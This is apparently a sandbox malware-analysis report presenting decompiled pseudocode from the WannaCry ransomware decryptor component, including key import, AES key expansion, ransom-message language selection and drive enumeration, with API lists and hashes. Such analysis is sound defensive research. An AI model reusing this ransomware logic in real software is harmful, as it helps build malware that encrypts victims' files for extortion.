                                                      • String ID: TESTDATA
                                                      • API String ID: 154225373-1607903762
                                                      • Opcode ID: 20c9666a7ffcf9d4be304aa18a7e829ae4cc28ed87e3f3fd2989e324c574ec42
                                                      • Instruction ID: 12943b98363484da7d263465f98eb3331ab271d68fc45af0c4cd497e7be75c93
                                                      • Opcode Fuzzy Hash: 20c9666a7ffcf9d4be304aa18a7e829ae4cc28ed87e3f3fd2989e324c574ec42
                                                      • Instruction Fuzzy Hash: 21512DB6600218ABCB24CB64DC45BEBB7B4FB98320F10477DF915A72C1EB749A44CB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004049B0 Relevance: 10.6, APIs: 7, Instructions: 107fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E004049B0(long* _a4, HCRYPTKEY* _a8, CHAR* _a12) {
				int _v8;
				char _v20;
				long _v32;
				int _v36;
				long _v40;
				void* _v44;
				long _t24;
				int _t28;
				BYTE* _t35;
				void* _t46;
				long _t51;
				intOrPtr _t53;

				_push(0xffffffff);
				_push(0x415e48);
				_push(0x413050);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t53;
				_v44 = 0xffffffff;
				_v32 = 0;
				_v36 = 0;
				_v8 = 0;
				_t46 = CreateFileA(_a12, 0x80000000, 1, 0, 3, 0, 0);
				_v44 = _t46;
				if(_t46 == 0xffffffff) {
					L10:
					_push(0xffffffff);
					goto L11;
				} else {
					_t24 = GetFileSize(_t46, 0);
					_t51 = _t24;
					_v40 = _t51;
					if(_t51 != 0xffffffff) {
						if(_t51 <= 0x19000) {
							_t35 = GlobalAlloc(0, _t51);
							_v36 = _t35;
							if(_t35 == 0) {
								goto L10;
							} else {
								if(ReadFile(_t46, _t35, _t51,  &_v32, 0) != 0) {
									_t28 = CryptImportKey(_a4, _t35, _v32, 0, 0, _a8);
									_push(0xffffffff);
									if(_t28 == 0) {
										L11:
										_push( &_v20);
										goto L12;
									} else {
										_push( &_v20);
										L00413056();
										 *[fs:0x0] = _v20;
										return 1;
									}
								} else {
									_push(0xffffffff);
									_push( &_v20);
									goto L12;
								}
							}
						} else {
							_push(0xffffffff);
							_push( &_v20);
							goto L12;
						}
					} else {
						_push(_t24);
						_push( &_v20);
						L12:
						L00413056();
						 *[fs:0x0] = _v20;
						return 0;
					}
				}
			}















                                                      0x004049b3
                                                      0x004049b5
                                                      0x004049ba
                                                      0x004049c5
                                                      0x004049c6
                                                      0x004049d3
                                                      0x004049dc
                                                      0x004049df
                                                      0x004049e2
                                                      0x004049fb
                                                      0x004049fd
                                                      0x00404a03
                                                      0x00404ac1
                                                      0x00404ac1
                                                      0x00000000
                                                      0x00404a09
                                                      0x00404a0b
                                                      0x00404a11
                                                      0x00404a13
                                                      0x00404a19
                                                      0x00404a2b
                                                      0x00404a40
                                                      0x00404a42
                                                      0x00404a47
                                                      0x00000000
                                                      0x00404a49
                                                      0x00404a5a
                                                      0x00404a75
                                                      0x00404a7d
                                                      0x00404a7f
                                                      0x00404ac3
                                                      0x00404ac6
                                                      0x00000000
                                                      0x00404a81
                                                      0x00404a84
                                                      0x00404a85
                                                      0x00404a95
                                                      0x00404aa2
                                                      0x00404aa2
                                                      0x00404a5c
                                                      0x00404a5c
                                                      0x00404a61
                                                      0x00000000
                                                      0x00404a61
                                                      0x00404a5a
                                                      0x00404a2d
                                                      0x00404a2d
                                                      0x00404a32
                                                      0x00000000
                                                      0x00404a32
                                                      0x00404a1b
                                                      0x00404a1b
                                                      0x00404a1f
                                                      0x00404ac7
                                                      0x00404ac7
                                                      0x00404ad4
                                                      0x00404ae1
                                                      0x00404ae1
                                                      0x00404a19

                                                      APIs
                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
                                                      • _local_unwind2.MSVCRT ref: 00404AC7
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CreateSize_local_unwind2
                                                      • String ID:
                                                      • API String ID: 1039228802-0
                                                      • Opcode ID: 90535d59a0f2dbe90f1bf53ea38d3d76a54ffae39caaa8181d17ff2389417ade
                                                      • Instruction ID: 027920ce5e1762b5ae47f20262b5a931ea28e629a989eecbafe96ff87ad0b853
                                                      • Opcode Fuzzy Hash: 90535d59a0f2dbe90f1bf53ea38d3d76a54ffae39caaa8181d17ff2389417ade
                                                      • Instruction Fuzzy Hash: 723153B1A40219BBDB10DF98DC84FFFB6ACE789771F14472AF525A22C0D33859018B68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406C20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 85%
                                                      			E00406C20(void* __ecx) {
				void _v51;
				void* _v52;
				signed int _t14;
				void* _t26;
				char* _t30;
				unsigned int _t36;
				signed int _t37;
				void* _t55;

				_t26 = __ecx;
				_v52 = 0;
				memset( &_v51, 0, 0xc << 2);
				asm("stosb");
				_t14 = GetUserDefaultLangID();
				_t30 =  &_v52;
				if(GetLocaleInfoA(_t14 & 0x0000ffff, 0x1001, _t30, 0x32) == 0) {
					asm("repne scasb");
					_t36 =  !(_t30 | 0xffffffff);
					_t55 = "English" - _t36;
					_t37 = _t36 >> 2;
					memcpy(_t55 + _t37 + _t37, _t55, memcpy( &_v52, _t55, _t37 << 2) & 0x00000003);
				}
				if(SendMessageA( *(_t26 + 0x80), 0x158, 0,  &_v52) != 0xffffffff) {
					SendMessageA( *(_t26 + 0x80), 0x14d, 0,  &_v52);
					return E00406AE0(_t26);
				} else {
					SendMessageA( *(_t26 + 0x80), 0x14e, 0, 0);
					return E00406AE0(_t26);
				}
			}











                                                      0x00406c25
                                                      0x00406c33
                                                      0x00406c38
                                                      0x00406c3a
                                                      0x00406c3b
                                                      0x00406c41
                                                      0x00406c5b
                                                      0x00406c65
                                                      0x00406c67
                                                      0x00406c71
                                                      0x00406c75
                                                      0x00406c7f
                                                      0x00406c7f
                                                      0x00406c9f
                                                      0x00406cd4
                                                      0x00406ce3
                                                      0x00406ca1
                                                      0x00406cb1
                                                      0x00406cc0
                                                      0x00406cc0

                                                      APIs
                                                      • GetUserDefaultLangID.KERNEL32 ref: 00406C3B
                                                      • GetLocaleInfoA.KERNEL32(00000000,00001001,00000000,00000032), ref: 00406C53
                                                      • SendMessageA.USER32(?,00000158,00000000,00000000), ref: 00406C9A
                                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00406CB1
                                                      • SendMessageA.USER32(?,0000014D,00000000,00000000), ref: 00406CD4
                                                        • Part of subcall function 00406AE0: #540.MFC42(?,767B20C0), ref: 00406B03
                                                        • Part of subcall function 00406AE0: #3874.MFC42 ref: 00406B1B
                                                        • Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B29
                                                        • Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406B41
                                                        • Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406B59
                                                        • Part of subcall function 00406AE0: #800.MFC42(?,?,767B20C0), ref: 00406B62
                                                        • Part of subcall function 00406AE0: #800.MFC42 ref: 00406B73
                                                        • Part of subcall function 00406AE0: GetFileAttributesA.KERNEL32(?), ref: 00406B7D
                                                        • Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B91
                                                        • Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406BA9
                                                        • Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406BBB
                                                        • Part of subcall function 00406AE0: #800.MFC42(?,?,?,?,?,767B20C0), ref: 00406BC4
                                                        • Part of subcall function 00406AE0: #800.MFC42 ref: 00406BD5
                                                        • Part of subcall function 00406AE0: #800.MFC42(?), ref: 00406BF5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800$MessageSend$#537#924sprintf$#3874#540AttributesDefaultFileInfoLangLocaleUser
                                                      • String ID: English
                                                      • API String ID: 600832625-3812506524
                                                      • Opcode ID: 98bbcc99f84d21185ee3b515649f036d805e480a8587630640b34afead2fff3e
                                                      • Instruction ID: 12cb8a10269d81aa60d086da51d7e65d8080bc449a50ca3d57c6290c1d86febe
                                                      • Opcode Fuzzy Hash: 98bbcc99f84d21185ee3b515649f036d805e480a8587630640b34afead2fff3e
                                                      • Instruction Fuzzy Hash: F911D3717402006BEB149634DC42BAB7795EBD4720F54863EFE5AEB2D0D9F8A8098794
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040A150 Relevance: 9.4, APIs: 6, Instructions: 375COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 60%
                                                      			E0040A150(void* __ecx) {
				void* _t170;
				void* _t177;
				unsigned int _t178;
				intOrPtr _t182;
				signed int _t189;
				signed int _t190;
				signed int _t192;
				signed int* _t198;
				signed int* _t203;
				signed int _t214;
				signed int* _t215;
				signed int _t224;
				void* _t236;
				unsigned int _t238;
				signed int _t239;
				signed int _t245;
				signed int _t251;
				void* _t268;
				void* _t275;
				signed int _t276;
				void* _t278;
				signed int _t290;
				int _t292;
				signed int _t293;
				signed int _t317;
				signed int _t321;
				signed int _t337;
				signed int _t353;
				signed int _t355;
				intOrPtr* _t375;
				signed int _t378;
				void* _t385;
				void* _t386;
				void* _t387;
				signed int _t388;
				signed int* _t390;
				void* _t391;
				void* _t392;
				signed int _t395;
				signed int* _t397;
				intOrPtr _t398;
				void* _t399;
				void* _t403;

				_t236 = __ecx;
				if( *((intOrPtr*)(_t399 + 4)) == 0) {
					 *((intOrPtr*)(_t399 + 0x1c)) = 0x4213b4;
					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
					_push(0x41c9c0);
					_push(_t399 + 8);
					L004130FC();
				}
				_t170 =  *(_t399 + 0x20);
				if(_t170 != 0x10 && _t170 != 0x18 && _t170 != 0x20) {
					 *((intOrPtr*)(_t399 + 0x1c)) = 0x4213b4;
					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
					_t170 = _t399 + 8;
					_push(0x41c9c0);
					_push(_t170);
					L004130FC();
				}
				_t238 =  *(_t399 + 0x24);
				if(_t238 != 0x10 && _t238 != 0x18 && _t238 != 0x20) {
					 *((intOrPtr*)(_t399 + 0x18)) = 0x4213b4;
					_t238 = _t399 + 0xc;
					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
					_push(0x41c9c0);
					_push(_t399 + 8);
					L004130FC();
				}
				 *(_t236 + 0x3c8) = _t170;
				 *(_t236 + 0x3cc) = _t238;
				_t290 = _t238;
				_t385 =  *(_t399 + 0x20);
				_t19 = _t236 + 0x3d0; // 0x424
				_t239 = _t238 >> 2;
				memcpy(_t19, _t385, _t239 << 2);
				_t386 = memcpy(_t385 + _t239 + _t239, _t385, _t290 & 0x00000003);
				_t22 = _t236 + 0x3f0; // 0x444
				_t245 =  *(_t236 + 0x3cc) >> 2;
				memcpy(_t386 + _t245 + _t245, _t386, memcpy(_t22, _t386, _t245 << 2) & 0x00000003);
				_t403 = _t399 + 0x30;
				_t177 =  *(_t236 + 0x3c8);
				if(_t177 == 0x10) {
					_t178 =  *(_t236 + 0x3cc);
					if(_t178 != 0x10) {
						asm("sbb eax, eax");
						_t182 = ( ~(_t178 - 0x18) & 0x00000002) + 0xc;
					} else {
						_t182 = 0xa;
					}
					 *((intOrPtr*)(_t236 + 0x410)) = _t182;
				} else {
					if(_t177 == 0x18) {
						asm("sbb ecx, ecx");
						 *((intOrPtr*)(_t236 + 0x410)) = ( ~( *(_t236 + 0x3cc) - 0x20) & 0xfffffffe) + 0xe;
					} else {
						 *((intOrPtr*)(_t236 + 0x410)) = 0xe;
					}
				}
				asm("cdq");
				_t292 = 0;
				_t251 =  *(_t236 + 0x3cc) + (_t290 & 0x00000003) >> 2;
				 *(_t403 + 0x2c) = _t251;
				if( *((intOrPtr*)(_t236 + 0x410)) < 0) {
					L23:
					_t293 = 0;
					if( *((intOrPtr*)(_t236 + 0x410)) < 0) {
						L28:
						_t44 = _t236 + 0x414; // 0x468
						_t387 = _t44;
						asm("cdq");
						_t353 = ( *((intOrPtr*)(_t236 + 0x410)) + 1) * _t251;
						 *(_t403 + 0x30) = _t353;
						_t189 =  *(_t403 + 0x24);
						_t395 =  *(_t236 + 0x3c8) + (_t293 & 0x00000003) >> 2;
						 *(_t403 + 0x10) = _t395;
						if(_t395 <= 0) {
							L31:
							_t388 = 0;
							if(_t395 <= 0) {
								L35:
								if(_t388 >= _t353) {
									L51:
									_t190 = 1;
									 *(_t403 + 0x30) = 1;
									if( *((intOrPtr*)(_t236 + 0x410)) <= 1) {
										L58:
										 *((char*)(_t236 + 4)) = 1;
										return _t190;
									}
									_t151 = _t236 + 0x208; // 0x25c
									_t397 = _t151;
									do {
										if(_t251 <= 0) {
											goto L57;
										}
										_t390 = _t397;
										_t355 = _t251;
										do {
											_t192 =  *_t390;
											 *(_t403 + 0x24) = _t192;
											_t390 =  &(_t390[1]);
											_t355 = _t355 - 1;
											 *(_t390 - 4) =  *0x004191B0 ^  *0x004195B0 ^  *0x004199B0 ^  *(0x419db0 + (_t192 & 0x000000ff) * 4);
										} while (_t355 != 0);
										_t251 =  *(_t403 + 0x2c);
										L57:
										_t190 =  *(_t403 + 0x30) + 1;
										_t397 =  &(_t397[8]);
										 *(_t403 + 0x30) = _t190;
									} while (_t190 <  *((intOrPtr*)(_t236 + 0x410)));
									goto L58;
								}
								 *(_t403 + 0x28) = 0x41a1b0;
								do {
									 *(_t403 + 0x24) =  *(_t236 + 0x410 + _t395 * 4);
									 *(_t236 + 0x414) =  *(_t236 + 0x414) ^ ((( *0x00416FB0 ^  *( *(_t403 + 0x28))) << 0x00000008 ^ 0) << 0x00000008 ^ 0) << 0x00000008 ^ 0;
									 *(_t403 + 0x28) =  *(_t403 + 0x28) + 1;
									if(_t395 == 8) {
										_t104 = _t236 + 0x418; // 0x46c
										_t198 = _t104;
										_t268 = 3;
										do {
											 *_t198 =  *_t198 ^  *(_t198 - 4);
											_t198 =  &(_t198[1]);
											_t268 = _t268 - 1;
										} while (_t268 != 0);
										 *(_t403 + 0x24) =  *(_t236 + 0x420);
										_t275 = 3;
										 *(_t236 + 0x424) =  *(_t236 + 0x424) ^ (( *0x00416FB0 << 0x00000008 ^ 0) << 0x00000008 ^ 0) << 0x00000008 ^ 0;
										_t116 = _t236 + 0x428; // 0x47c
										_t203 = _t116;
										do {
											 *_t203 =  *_t203 ^  *(_t203 - 4);
											_t203 =  &(_t203[1]);
											_t275 = _t275 - 1;
										} while (_t275 != 0);
										L46:
										 *(_t403 + 0x24) = 0;
										if(_t395 <= 0) {
											goto L50;
										}
										_t119 = _t236 + 0x414; // 0x468
										_t375 = _t119;
										while(1) {
											_t251 =  *(_t403 + 0x2c);
											if(_t388 >=  *(_t403 + 0x30)) {
												goto L51;
											}
											_t398 =  *_t375;
											asm("cdq");
											_t375 = _t375 + 4;
											_t276 = _t388 / _t251;
											asm("cdq");
											_t317 = _t388 %  *(_t403 + 0x2c);
											 *((intOrPtr*)(_t236 + 8 + (_t317 + _t276 * 8) * 4)) = _t398;
											_t395 =  *(_t403 + 0x10);
											_t214 =  *(_t403 + 0x24) + 1;
											_t388 = _t388 + 1;
											 *((intOrPtr*)(_t236 + 0x1e8 + (_t317 + ( *((intOrPtr*)(_t236 + 0x410)) - _t276) * 8) * 4)) =  *((intOrPtr*)(_t375 - 4));
											 *(_t403 + 0x24) = _t214;
											if(_t214 < _t395) {
												continue;
											}
											goto L50;
										}
										goto L51;
									}
									if(_t395 <= 1) {
										goto L46;
									}
									_t101 = _t236 + 0x418; // 0x46c
									_t215 = _t101;
									_t278 = _t395 - 1;
									do {
										 *_t215 =  *_t215 ^  *(_t215 - 4);
										_t215 =  &(_t215[1]);
										_t278 = _t278 - 1;
									} while (_t278 != 0);
									goto L46;
									L50:
									_t251 =  *(_t403 + 0x2c);
								} while (_t388 <  *(_t403 + 0x30));
								goto L51;
							}
							_t58 = _t236 + 0x414; // 0x468
							 *(_t403 + 0x24) = _t58;
							while(_t388 < _t353) {
								asm("cdq");
								_t378 = _t388 / _t251;
								asm("cdq");
								_t321 = _t388 % _t251;
								 *(_t403 + 0x28) = _t321;
								 *((intOrPtr*)(_t236 + 8 + (_t321 + _t378 * 8) * 4)) =  *( *(_t403 + 0x24));
								_t388 = _t388 + 1;
								_t224 =  *(_t403 + 0x24);
								 *((intOrPtr*)(_t236 + 0x1e8 + ( *(_t403 + 0x28) + ( *((intOrPtr*)(_t236 + 0x410)) - _t378) * 8) * 4)) =  *_t224;
								_t353 =  *(_t403 + 0x30);
								 *(_t403 + 0x24) = _t224 + 4;
								if(_t388 < _t395) {
									continue;
								}
								goto L35;
							}
							goto L51;
						}
						 *(_t403 + 0x24) = _t395;
						do {
							_t387 = _t387 + 4;
							 *(_t387 - 4) = 0 << 0x18;
							 *(_t387 - 4) =  *(_t387 - 4) | 0 << 0x00000010;
							_t189 = _t189 + 4;
							_t337 =  *(_t403 + 0x24) - 1;
							 *(_t403 + 0x24) = _t337;
						} while (_t337 != 0);
						goto L31;
					}
					_t38 = _t236 + 0x1e8; // 0x23c
					_t391 = _t38;
					do {
						if(_t251 > 0) {
							memset(_t391, 0, _t251 << 2);
							_t403 = _t403 + 0xc;
							_t251 =  *(_t403 + 0x2c);
						}
						_t293 = _t293 + 1;
						_t391 = _t391 + 0x20;
					} while (_t293 <=  *((intOrPtr*)(_t236 + 0x410)));
					goto L28;
				} else {
					_t33 = _t236 + 8; // 0x5c
					_t392 = _t33;
					do {
						if(_t251 > 0) {
							memset(_t392, 0, _t251 << 2);
							_t403 = _t403 + 0xc;
							_t251 =  *(_t403 + 0x2c);
						}
						_t292 = _t292 + 1;
						_t392 = _t392 + 0x20;
					} while (_t292 <=  *((intOrPtr*)(_t236 + 0x410)));
					goto L23;
				}
			}














































                                                      0x0040a15a
                                                      0x0040a15c
                                                      0x0040a167
                                                      0x0040a16f
                                                      0x0040a179
                                                      0x0040a17e
                                                      0x0040a17f
                                                      0x0040a17f
                                                      0x0040a184
                                                      0x0040a18b
                                                      0x0040a1a0
                                                      0x0040a1a8
                                                      0x0040a1ae
                                                      0x0040a1b2
                                                      0x0040a1b7
                                                      0x0040a1b8
                                                      0x0040a1b8
                                                      0x0040a1bd
                                                      0x0040a1c4
                                                      0x0040a1d4
                                                      0x0040a1dd
                                                      0x0040a1e1
                                                      0x0040a1eb
                                                      0x0040a1f0
                                                      0x0040a1f1
                                                      0x0040a1f1
                                                      0x0040a1f7
                                                      0x0040a201
                                                      0x0040a208
                                                      0x0040a20b
                                                      0x0040a20d
                                                      0x0040a213
                                                      0x0040a216
                                                      0x0040a225
                                                      0x0040a229
                                                      0x0040a22f
                                                      0x0040a239
                                                      0x0040a239
                                                      0x0040a23b
                                                      0x0040a244
                                                      0x0040a272
                                                      0x0040a27b
                                                      0x0040a289
                                                      0x0040a28e
                                                      0x0040a27d
                                                      0x0040a27d
                                                      0x0040a27d
                                                      0x0040a291
                                                      0x0040a246
                                                      0x0040a249
                                                      0x0040a262
                                                      0x0040a26a
                                                      0x0040a24b
                                                      0x0040a24b
                                                      0x0040a24b
                                                      0x0040a249
                                                      0x0040a29d
                                                      0x0040a2a3
                                                      0x0040a2ad
                                                      0x0040a2b2
                                                      0x0040a2b6
                                                      0x0040a2d7
                                                      0x0040a2dd
                                                      0x0040a2e1
                                                      0x0040a305
                                                      0x0040a312
                                                      0x0040a312
                                                      0x0040a318
                                                      0x0040a319
                                                      0x0040a31f
                                                      0x0040a327
                                                      0x0040a32b
                                                      0x0040a330
                                                      0x0040a334
                                                      0x0040a36e
                                                      0x0040a36e
                                                      0x0040a372
                                                      0x0040a3cf
                                                      0x0040a3d1
                                                      0x0040a576
                                                      0x0040a57c
                                                      0x0040a583
                                                      0x0040a587
                                                      0x0040a5f3
                                                      0x0040a5f5
                                                      0x0040a5fe
                                                      0x0040a5fe
                                                      0x0040a589
                                                      0x0040a589
                                                      0x0040a58f
                                                      0x0040a591
                                                      0x00000000
                                                      0x00000000
                                                      0x0040a593
                                                      0x0040a595
                                                      0x0040a597
                                                      0x0040a597
                                                      0x0040a59b
                                                      0x0040a5a5
                                                      0x0040a5d3
                                                      0x0040a5d4
                                                      0x0040a5d4
                                                      0x0040a5d9
                                                      0x0040a5dd
                                                      0x0040a5e7
                                                      0x0040a5e8
                                                      0x0040a5ed
                                                      0x0040a5ed
                                                      0x00000000
                                                      0x0040a58f
                                                      0x0040a3d7
                                                      0x0040a3df
                                                      0x0040a3e8
                                                      0x0040a446
                                                      0x0040a44c
                                                      0x0040a450
                                                      0x0040a478
                                                      0x0040a478
                                                      0x0040a47e
                                                      0x0040a483
                                                      0x0040a48a
                                                      0x0040a48c
                                                      0x0040a48f
                                                      0x0040a48f
                                                      0x0040a49a
                                                      0x0040a4e0
                                                      0x0040a4ec
                                                      0x0040a4f2
                                                      0x0040a4f2
                                                      0x0040a4f8
                                                      0x0040a4ff
                                                      0x0040a501
                                                      0x0040a504
                                                      0x0040a504
                                                      0x0040a507
                                                      0x0040a509
                                                      0x0040a511
                                                      0x00000000
                                                      0x00000000
                                                      0x0040a513
                                                      0x0040a513
                                                      0x0040a519
                                                      0x0040a51d
                                                      0x0040a523
                                                      0x00000000
                                                      0x00000000
                                                      0x0040a527
                                                      0x0040a529
                                                      0x0040a52c
                                                      0x0040a52f
                                                      0x0040a533
                                                      0x0040a534
                                                      0x0040a53b
                                                      0x0040a545
                                                      0x0040a555
                                                      0x0040a556
                                                      0x0040a559
                                                      0x0040a560
                                                      0x0040a564
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040a564
                                                      0x00000000
                                                      0x0040a519
                                                      0x0040a455
                                                      0x00000000
                                                      0x00000000
                                                      0x0040a45b
                                                      0x0040a45b
                                                      0x0040a461
                                                      0x0040a464
                                                      0x0040a46b
                                                      0x0040a46d
                                                      0x0040a470
                                                      0x0040a470
                                                      0x00000000
                                                      0x0040a566
                                                      0x0040a56a
                                                      0x0040a56e
                                                      0x00000000
                                                      0x0040a3df
                                                      0x0040a374
                                                      0x0040a37a
                                                      0x0040a37e
                                                      0x0040a388
                                                      0x0040a38b
                                                      0x0040a38f
                                                      0x0040a390
                                                      0x0040a392
                                                      0x0040a39f
                                                      0x0040a3af
                                                      0x0040a3b3
                                                      0x0040a3bc
                                                      0x0040a3c3
                                                      0x0040a3c9
                                                      0x0040a3cd
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040a3cd
                                                      0x00000000
                                                      0x0040a37e
                                                      0x0040a336
                                                      0x0040a33a
                                                      0x0040a33c
                                                      0x0040a344
                                                      0x0040a34f
                                                      0x0040a366
                                                      0x0040a367
                                                      0x0040a368
                                                      0x0040a368
                                                      0x00000000
                                                      0x0040a33a
                                                      0x0040a2e3
                                                      0x0040a2e3
                                                      0x0040a2e9
                                                      0x0040a2eb
                                                      0x0040a2f1
                                                      0x0040a2f1
                                                      0x0040a2f3
                                                      0x0040a2f3
                                                      0x0040a2fd
                                                      0x0040a2fe
                                                      0x0040a301
                                                      0x00000000
                                                      0x0040a2b8
                                                      0x0040a2b8
                                                      0x0040a2b8
                                                      0x0040a2bb
                                                      0x0040a2bd
                                                      0x0040a2c3
                                                      0x0040a2c3
                                                      0x0040a2c5
                                                      0x0040a2c5
                                                      0x0040a2cf
                                                      0x0040a2d0
                                                      0x0040a2d3
                                                      0x00000000
                                                      0x0040a2bb

                                                      APIs
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT ref: 0040A16F
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A17F
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1A8
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1B8
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1E1
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1F1
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??0exception@@ExceptionThrow
                                                      • String ID:
                                                      • API String ID: 941485209-0
                                                      • Opcode ID: 1e118166748c2516ccf34b16e56ce24d223970c5c76bb6d30bfc94f2d512404d
                                                      • Instruction ID: fb0ef9a6f766abd1277d4fb3e7775c965cb771230ee66441beda5a672c207522
                                                      • Opcode Fuzzy Hash: 1e118166748c2516ccf34b16e56ce24d223970c5c76bb6d30bfc94f2d512404d
                                                      • Instruction Fuzzy Hash: 57E1E4716043458BD718CF29C4906AAB7E2BFCC308F09857EE889EB355DB34D941CB5A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00403A20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00403A20(intOrPtr _a4, intOrPtr _a8) {
				union _ULARGE_INTEGER _v8;
				union _ULARGE_INTEGER _v16;
				intOrPtr _v20;
				union _ULARGE_INTEGER _v24;
				short _v28;
				short _v32;
				short _t23;
				short _t34;
				signed int _t47;
				unsigned int _t50;

				if( *((intOrPtr*)(_a8 + 8)) != 0) {
					return 1;
				} else {
					_t50 = GetLogicalDrives();
					_t47 = 2;
					do {
						if((_t50 >> _t47 & 0x00000001) != 0) {
							_t23 =  *L" : "; // 0x3a0020
							_t34 =  *0x420760; // 0x20
							_v32 = _t23;
							_t7 = _t47 + 0x41; // 0x43
							_v28 = _t34;
							_v32 = _t7;
							_v28 = 0x5c;
							if(GetDriveTypeW( &_v32) != 5 && GetDiskFreeSpaceExW( &_v32,  &_v8,  &_v24,  &_v16) != 0 && (_v20 > 0 || _v24.LowPart > 0)) {
								_v28 = 0;
								E004026B0(_a4,  &_v32);
							}
						}
						_t47 = _t47 + 1;
					} while (_t47 <= 0x19);
					return 1;
				}
			}













                                                      0x00403a2c
                                                      0x00403ae4
                                                      0x00403a32
                                                      0x00403a41
                                                      0x00403a43
                                                      0x00403a48
                                                      0x00403a51
                                                      0x00403a53
                                                      0x00403a58
                                                      0x00403a5e
                                                      0x00403a66
                                                      0x00403a69
                                                      0x00403a6e
                                                      0x00403a73
                                                      0x00403a7f
                                                      0x00403ab8
                                                      0x00403abf
                                                      0x00403abf
                                                      0x00403a7f
                                                      0x00403ac4
                                                      0x00403ac5
                                                      0x00403ad9
                                                      0x00403ad9

                                                      APIs
                                                      • GetLogicalDrives.KERNEL32 ref: 00403A35
                                                      • GetDriveTypeW.KERNEL32 ref: 00403A7A
                                                      • GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
